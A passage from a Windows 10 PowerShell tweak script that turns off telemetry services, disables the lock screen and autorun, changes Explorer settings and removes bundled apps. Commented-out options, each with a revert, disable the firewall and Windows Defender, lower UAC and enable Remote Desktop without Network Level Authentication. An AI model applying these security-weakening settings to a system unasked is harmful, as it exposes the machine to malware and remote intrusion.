        New-Item -Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore" -Force | Out-Null
    }
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore" -Name "HarvestContacts" -Type DWord -Value 0

    # Enable Cortana
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Personalization\Settings" -Name "AcceptedPrivacyPolicy"
    # Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitTextCollection" -Type DWord -Value 0
    # Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitInkCollection" -Type DWord -Value 0
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore" -Name "HarvestContacts"

    # Restrict Windows Update P2P only to local network
    Write-Host "Restricting Windows Update P2P only to local network..."
    Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" -Name "DODownloadMode" -Type DWord -Value 1
    If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization")) {
        New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" | Out-Null
    }
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" -Name "SystemSettingsDownloadMode" -Type DWord -Value 3

    # Unrestrict Windows Update P2P
    # Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" -Name "DODownloadMode"
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" -Name "SystemSettingsDownloadMode"

    # Remove AutoLogger file and restrict directory
    Write-Host "Removing AutoLogger file and restricting directory..."
    $autoLoggerDir = "$env:PROGRAMDATA\Microsoft\Diagnosis\ETLLogs\AutoLogger"
    If (Test-Path "$autoLoggerDir\AutoLogger-Diagtrack-Listener.etl") {
        Remove-Item "$autoLoggerDir\AutoLogger-Diagtrack-Listener.etl"
    }
    icacls $autoLoggerDir /deny SYSTEM:`(OI`)`(CI`)F | Out-Null

    # Unrestrict AutoLogger directory
    # $autoLoggerDir = "$env:PROGRAMDATA\Microsoft\Diagnosis\ETLLogs\AutoLogger"
    # icacls $autoLoggerDir /grant:r SYSTEM:`(OI`)`(CI`)F | Out-Null

    # Stop and disable Diagnostics Tracking Service
    Write-Host "Stopping and disabling Diagnostics Tracking Service..."
    Stop-Service "DiagTrack"
    Set-Service "DiagTrack" -StartupType Disabled

    # Enable and start Diagnostics Tracking Service
    # Set-Service "DiagTrack" -StartupType Automatic
    # Start-Service "DiagTrack"

    # Stop and disable WAP Push Service
    Write-Host "Stopping and disabling WAP Push Service..."
    Stop-Service "dmwappushservice"
    Set-Service "dmwappushservice" -StartupType Disabled

    # Enable and start WAP Push Service
    # Set-Service "dmwappushservice" -StartupType Automatic
    # Start-Service "dmwappushservice"
    # Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice" -Name "DelayedAutoStart" -Type DWord -Value 1

    ##########
    # Service Tweaks
    ##########

    # Lower UAC level
    # Write-Host "Lowering UAC level..."
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Type DWord -Value 0
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "PromptOnSecureDesktop" -Type DWord -Value 0

    # Raise UAC level
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Type DWord -Value 5
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "PromptOnSecureDesktop" -Type DWord -Value 1

    # Enable sharing mapped drives between users
    # Write-Host "Enabling sharing mapped drives between users..."
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLinkedConnections" -Type DWord -Value 1

    # Disable sharing mapped drives between users
    # Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLinkedConnections"

    # Disable Firewall
    # Write-Host "Disabling Firewall..."
    # Set-NetFirewallProfile -Profile * -Enabled False

    # Enable Firewall
    # Set-NetFirewallProfile -Profile * -Enabled True

    # Disable Windows Defender
    # Write-Host "Disabling Windows Defender..."
    # Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Type DWord -Value 1

    # Enable Windows Defender
    # Remove-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware"

    # Disable Windows Update automatic restart
    Write-Host "Disabling Windows Update automatic restart..."
    Set-ItemProperty -Path "HKLM:\Software\Microsoft\WindowsUpdate\UX\Settings" -Name "UxOption" -Type DWord -Value 1

    # Enable Windows Update automatic restart
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\WindowsUpdate\UX\Settings" -Name "UxOption" -Type DWord -Value 0

    # Stop and disable Home Groups services
    Write-Host "Stopping and disabling Home Groups services..."
    Stop-Service "HomeGroupListener"
    Set-Service "HomeGroupListener" -StartupType Disabled
    Stop-Service "HomeGroupProvider"
    Set-Service "HomeGroupProvider" -StartupType Disabled

    # Enable and start Home Groups services
    # Set-Service "HomeGroupListener" -StartupType Manual
    # Set-Service "HomeGroupProvider" -StartupType Manual
    # Start-Service "HomeGroupProvider"

    # Disable Remote Assistance
    # Write-Host "Disabling Remote Assistance..."
    # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Remote Assistance" -Name "fAllowToGetHelp" -Type DWord -Value 0

    # Enable Remote Assistance
    # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Remote Assistance" -Name "fAllowToGetHelp" -Type DWord -Value 1

    # Enable Remote Desktop w/o Network Level Authentication
    # Write-Host "Enabling Remote Desktop w/o Network Level Authentication..."
# Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Type DWord -Value 0 # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Type DWord -Value 0 # Disable Remote Desktop # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Type DWord -Value 1 # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Type DWord -Value 1 ########## # UI Tweaks ########## # Disable Action Center # Write-Host "Disabling Action Center..." # If (!(Test-Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer")) { # New-Item -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" | Out-Null # } # Set-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" -Type DWord -Value 1 # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0 # Enable Action Center # Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" # Disable Lock screen Write-Host "Disabling Lock screen..." 
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization")) { New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" | Out-Null } Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" -Name "NoLockScreen" -Type DWord -Value 1 # Enable Lock screen # Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" -Name "NoLockScreen" # Disable Lock screen (Anniversary Update workaround) #If ([System.Environment]::OSVersion.Version.Build -gt 14392) { # Apply only for Redstone 1 or newer # $service = New-Object -com Schedule.Service # $service.Connect() # $task = $service.NewTask(0) # $task.Settings.DisallowStartIfOnBatteries = $false # $trigger = $task.Triggers.Create(9) # $trigger = $task.Triggers.Create(11) # $trigger.StateChange = 8 # $action = $task.Actions.Create(0) # $action.Path = "reg.exe" # $action.Arguments = "add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\SessionData /t REG_DWORD /v AllowLockScreen /d 0 /f" # $service.GetFolder("\").RegisterTaskDefinition("Disable LockScreen", $task, 6, "NT AUTHORITY\SYSTEM", $null, 4) | Out-Null #} # Enable Lock screen (Anniversary Update workaround) #If ([System.Environment]::OSVersion.Version.Build -gt 14392) { # Apply only for Redstone 1 or newer # Unregister-ScheduledTask -TaskName "Disable LockScreen" -Confirm:$false -ErrorAction SilentlyContinue #} # Disable Autoplay Write-Host "Disabling Autoplay..." Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers" -Name "DisableAutoplay" -Type DWord -Value 1 # Enable Autoplay # Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers" -Name "DisableAutoplay" -Type DWord -Value 0 # Disable Autorun for all drives Write-Host "Disabling Autorun for all drives..." 
If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")) { New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoDriveTypeAutoRun" -Type DWord -Value 255 # Enable Autorun # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoDriveTypeAutoRun" #Disable Sticky keys prompt Write-Host "Disabling Sticky keys prompt..." Set-ItemProperty -Path "HKCU:\Control Panel\Accessibility\StickyKeys" -Name "Flags" -Type String -Value "506" # Enable Sticky keys prompt # Set-ItemProperty -Path "HKCU:\Control Panel\Accessibility\StickyKeys" -Name "Flags" -Type String -Value "510" # Hide Search button / box Write-Host "Hiding Search Box / Button..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "SearchboxTaskbarMode" -Type DWord -Value 0 # Show Search button / box # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "SearchboxTaskbarMode" # Hide Task View button # Write-Host "Hiding Task View button..." # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowTaskViewButton" -Type DWord -Value 0 # Show Task View button # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowTaskViewButton" # Show small icons in taskbar # Write-Host "Showing small icons in taskbar..." # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarSmallIcons" -Type DWord -Value 1 # Show large icons in taskbar # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarSmallIcons" # Show titles in taskbar # Write-Host "Showing titles in taskbar..." 
# Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarGlomLevel" -Type DWord -Value 1 # Hide titles in taskbar # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarGlomLevel" # Show all tray icons Write-Host "Showing all tray icons..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "EnableAutoTray" -Type DWord -Value 0 # Hide tray icons as needed # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "EnableAutoTray" # Show known file extensions Write-Host "Showing known file extensions..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "HideFileExt" -Type DWord -Value 0 # Hide known file extensions # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "HideFileExt" -Type DWord -Value 1 # Show hidden files Write-Host "Showing hidden files..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "Hidden" -Type DWord -Value 1 # Hide hidden files # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "Hidden" -Type DWord -Value 2 # Change default Explorer view to "Computer" Write-Host "Changing default Explorer view to `"Computer`"..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "LaunchTo" -Type DWord -Value 1 # Change default Explorer view to "Quick Access" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "LaunchTo" # Show Computer shortcut on desktop # Write-Host "Showing Computer shortcut on desktop..." 
# If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu")) { # New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" | Out-Null # } # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Type DWord -Value 0 # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Type DWord -Value 0 # Hide Computer shortcut from desktop # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" # Remove Desktop icon from computer namespace # Write-Host "Removing Desktop icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" -Recurse -ErrorAction SilentlyContinue # Add Desktop icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" # Remove Documents icon from computer namespace # Write-Host "Removing Documents icon from computer namespace..." 
# Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{d3162b92-9365-467a-956b-92703aca08af}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" -Recurse -ErrorAction SilentlyContinue # Add Documents icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{d3162b92-9365-467a-956b-92703aca08af}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" # Remove Downloads icon from computer namespace # Write-Host "Removing Downloads icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{088e3905-0323-4b02-9826-5d99428e115f}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" -Recurse -ErrorAction SilentlyContinue # Add Downloads icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{088e3905-0323-4b02-9826-5d99428e115f}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" # Remove Music icon from computer namespace # Write-Host "Removing Music icon from computer namespace..." 
# Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" -Recurse -ErrorAction SilentlyContinue # Add Music icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" # Remove Pictures icon from computer namespace # Write-Host "Removing Pictures icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" -Recurse -ErrorAction SilentlyContinue # Add Pictures icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" # Remove Videos icon from computer namespace # Write-Host "Removing Videos icon from computer namespace..." 
# Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" -Recurse -ErrorAction SilentlyContinue # Add Videos icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" ## Add secondary en-US keyboard #Write-Host "Adding secondary en-US keyboard..." #$langs = Get-WinUserLanguageList #$langs.Add("en-US") #Set-WinUserLanguageList $langs -Force # Remove secondary en-US keyboard # $langs = Get-WinUserLanguageList # Set-WinUserLanguageList ($langs | ? {$_.LanguageTag -ne "en-US"}) -Force ########## # Remove unwanted applications ########## # Disable OneDrive # Write-Host "Disabling OneDrive..." # If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive")) { # New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" | Out-Null # } # Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" -Name "DisableFileSyncNGSC" -Type DWord -Value 1 # Enable OneDrive # Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" -Name "DisableFileSyncNGSC" # Uninstall OneDrive # Write-Host "Uninstalling OneDrive..." 
# Stop-Process -Name OneDrive -ErrorAction SilentlyContinue # Start-Sleep -s 3 # $onedrive = "$env:SYSTEMROOT\SysWOW64\OneDriveSetup.exe" # If (!(Test-Path $onedrive)) { # $onedrive = "$env:SYSTEMROOT\System32\OneDriveSetup.exe" # } # Start-Process $onedrive "/uninstall" -NoNewWindow -Wait # Start-Sleep -s 3 # Stop-Process -Name explorer -ErrorAction SilentlyContinue # Start-Sleep -s 3 # Remove-Item "$env:USERPROFILE\OneDrive" -Force -Recurse -ErrorAction SilentlyContinue # Remove-Item "$env:LOCALAPPDATA\Microsoft\OneDrive" -Force -Recurse -ErrorAction SilentlyContinue # Remove-Item "$env:PROGRAMDATA\Microsoft OneDrive" -Force -Recurse -ErrorAction SilentlyContinue # If (Test-Path "$env:SYSTEMDRIVE\OneDriveTemp") { # Remove-Item "$env:SYSTEMDRIVE\OneDriveTemp" -Force -Recurse -ErrorAction SilentlyContinue # } # If (!(Test-Path "HKCR:")) { # New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null # } # Remove-Item -Path "HKCR:\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKCR:\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" -Recurse -ErrorAction SilentlyContinue # Install OneDrive # $onedrive = "$env:SYSTEMROOT\SysWOW64\OneDriveSetup.exe" # If (!(Test-Path $onedrive)) { # $onedrive = "$env:SYSTEMROOT\System32\OneDriveSetup.exe" # } # Start-Process $onedrive -NoNewWindow # Uninstall default bloatware Write-Host "Uninstalling default bloatware..." 
# Get-AppxPackage "Microsoft.3DBuilder" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingFinance" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingNews" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingSports" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingWeather" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Getstarted" | Remove-AppxPackage # Get-AppxPackage "Microsoft.MicrosoftOfficeHub" | Remove-AppxPackage # Get-AppxPackage "Microsoft.MicrosoftSolitaireCollection" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Office.OneNote" | Remove-AppxPackage # Get-AppxPackage "Microsoft.People" | Remove-AppxPackage # Get-AppxPackage "Microsoft.SkypeApp" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Windows.Photos" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsAlarms" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsCamera" | Remove-AppxPackage # Get-AppxPackage "microsoft.windowscommunicationsapps" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsMaps" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsPhone" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsSoundRecorder" | Remove-AppxPackage # Get-AppxPackage "Microsoft.XboxApp" | Remove-AppxPackage # Get-AppxPackage "Microsoft.ZuneMusic" | Remove-AppxPackage # Get-AppxPackage "Microsoft.ZuneVideo" | Remove-AppxPackage # Get-AppxPackage "Microsoft.AppConnector" | Remove-AppxPackage # Get-AppxPackage "Microsoft.ConnectivityStore" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Office.Sway" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Messaging" | Remove-AppxPackage # Get-AppxPackage "Microsoft.CommsPhone" | Remove-AppxPackage Get-AppxPackage "9E2F88E3.Twitter" | Remove-AppxPackage Get-AppxPackage "king.com.CandyCrushSodaSaga" | Remove-AppxPackage Get-AppxPackage "4DF9E0F8.Netflix" | Remove-AppxPackage # Get-AppxPackage "Drawboard.DrawboardPDF" | Remove-AppxPackage # Get-AppxPackage "Microsoft.MicrosoftStickyNotes" | Remove-AppxPackage # 
Get-AppxPackage "Microsoft.OneConnect" | Remove-AppxPackage Get-AppxPackage "D52A8D61.FarmVille2CountryEscape" | Remove-AppxPackage Get-AppxPackage "GAMELOFTSA.Asphalt8Airborne" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsFeedbackHub" | Remove-AppxPackage # Install default Microsoft applications # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.3DBuilder").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingFinance").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingNews").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingSports").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingWeather").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Getstarted").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.MicrosoftOfficeHub").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.MicrosoftSolitaireCollection").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Office.OneNote").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.People").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.SkypeApp").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers 
"Microsoft.Windows.Photos").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsAlarms").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsCamera").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.windowscommunicationsapps").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsMaps").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsPhone").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsSoundRecorder").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.XboxApp").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.ZuneMusic").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.ZuneVideo").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.AppConnector").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.ConnectivityStore").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Office.Sway").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Messaging").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register 
"$($(Get-AppXPackage -AllUsers "Microsoft.CommsPhone").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "9E2F88E3.Twitter").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "king.com.CandyCrushSodaSaga").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "4DF9E0F8.Netflix").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Drawboard.DrawboardPDF").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.MicrosoftStickyNotes").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.OneConnect").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "D52A8D61.FarmVille2CountryEscape").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "GAMELOFTSA.Asphalt8Airborne").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsFeedbackHub").InstallLocation)\AppXManifest.xml" # In case you have removed them for good, you can try to restore the files using installation medium as follows # New-Item C:\Mnt -Type Directory | Out-Null # dism /Mount-Image /ImageFile:D:\sources\install.wim /index:1 /ReadOnly 